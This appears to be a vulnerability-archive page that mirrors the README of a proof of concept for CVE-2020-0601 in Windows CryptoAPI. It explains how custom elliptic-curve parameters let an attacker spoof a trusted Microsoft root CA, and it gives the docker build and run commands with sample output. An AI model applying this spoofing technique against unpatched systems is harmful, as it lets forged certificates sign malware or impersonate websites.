关联漏洞
标题:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)Description:Microsoft Windows CryptoAPI是美国微软(Microsoft)公司的一个在Windows 操作系统中添加的密码编译机能。作为资料加密与解密功能的重要基础,CryptoAPI 支持同步,异步的密钥加密处理,以及操作系统中的数字证书 的管理工作。 Microsoft Windows CryptoAPI (Crypt32.dll)中验证椭圆曲线加密(ECC)证书的方法存在信任管理问题漏洞。攻击者可通过使用欺骗性的代码签名证书利用该漏洞签名恶意的可执行文件。以下产品及版本受到影响:Micr
Description
proof of concept for CVE-2020-0601
介绍
# CVE-2020-0601 proof of concept
A fun proof of concept to create your own root CA and signed certificate based
on the CVE-2020-0601 vulnerability in Windows 10. The basis for the issue is
the `CertGetCertificateChain()` method improperly validated root certificate
authorities. Since the search for a signing certificate within the trust store
can be expensive, Microsoft implemented a cache which used the public key of
the provided root certificate to determine if this certificate had previously
been loaded from the trust store. However, for elliptic curve certificates, the
SubjectPublicKeyInfo contains more than just a public key. Elliptic curve
certificates must reference the specific elliptic curve (or provide their own
custom elliptic curve parameters). The vulnerability occurs because the
elliptic curve parameters are not included in the cache lookup. We can take an
existing public key, choose a new private key, compute curve parameters which
make this combination valid, and create a root certificate that will pass
Microsoft's previously vulnerable cache lookup.
This repository demonstrates spoofing the "Microsoft EV ECC Root Certificate
Authority 2017" trusted root certificate and using this new root CA to sign a
leaf certificate.
## Build
```
docker build -t gringotts .
```
## Usage
```
$ docker run --rm -it -v "$(pwd):/host" -w /host gringotts
Modified generator:
04bb3de13398a18e1c0d1a2d77ae8cbb9ea358d8c5c075eac51e0c408a0367db2ba187f1ab2febd8859d4c12811563fae6056fef803bff43964ca15c63a28cdc1fdfd38dab9fac20e7a8fa1fae619e576ee5706423414a3c3f8c7e1a2d8adc9cd7
Serializing root.txt and self-sign root certificate
Writing ca/root.pem
Serializing root private key
Writing ca/root-key.pem
read EC key
writing EC key
Generating a RSA private key
...............................................+++++
.........................................................................................+++++
writing new private key to 'ssl/server-key.pem'
-----
Using configuration from /usr/lib/ssl/openssl.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
7c:e6:11:18:1c:5a:14:3e:6f:f0:e2:85:ea:5f:c7:dc:50:a4:b9:b2
Validity
Not Before: Apr 30 00:00:00 2018 GMT
Not After : Aug 1 00:00:00 2020 GMT
Subject:
countryName = GB
stateOrProvinceName = Scotland
localityName = Highlands
organizationName = Gringotts
organizationalUnitName = Hogwarts Castle
commonName = hogwarts.lf.lc
X509v3 extensions:
X509v3 Subject Alternative Name:
DNS:hogwarts.lf.lc
Certificate is to be certified until Aug 1 00:00:00 2020 GMT (184 days)
Write out database with 1 new entries
Data Base Updated
$ tree
.
├── ca
│ ├── root-key.pem
│ └── root.pem
└── ssl
├── server-bundle.pem
├── server-key.pem
└── server.pem
```
文件快照
[4.0K] /data/pocs/46912bfaa96b10715c59eac8e97b911d46dcf13a
├── [4.0K] assets
│ └── [ 92K] proof-of-concept.png
├── [ 542] Dockerfile
├── [3.1K] README.md
├── [ 30] requirements.txt
├── [4.0K] scripts
│ ├── [ 621] csr.sh
│ ├── [ 81] mint.sh
│ └── [1.9K] mkroot.py
└── [4.0K] templates
├── [ 896] root-key.txt
├── [3.5K] root.txt
└── [ 259] server.cnf
3 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。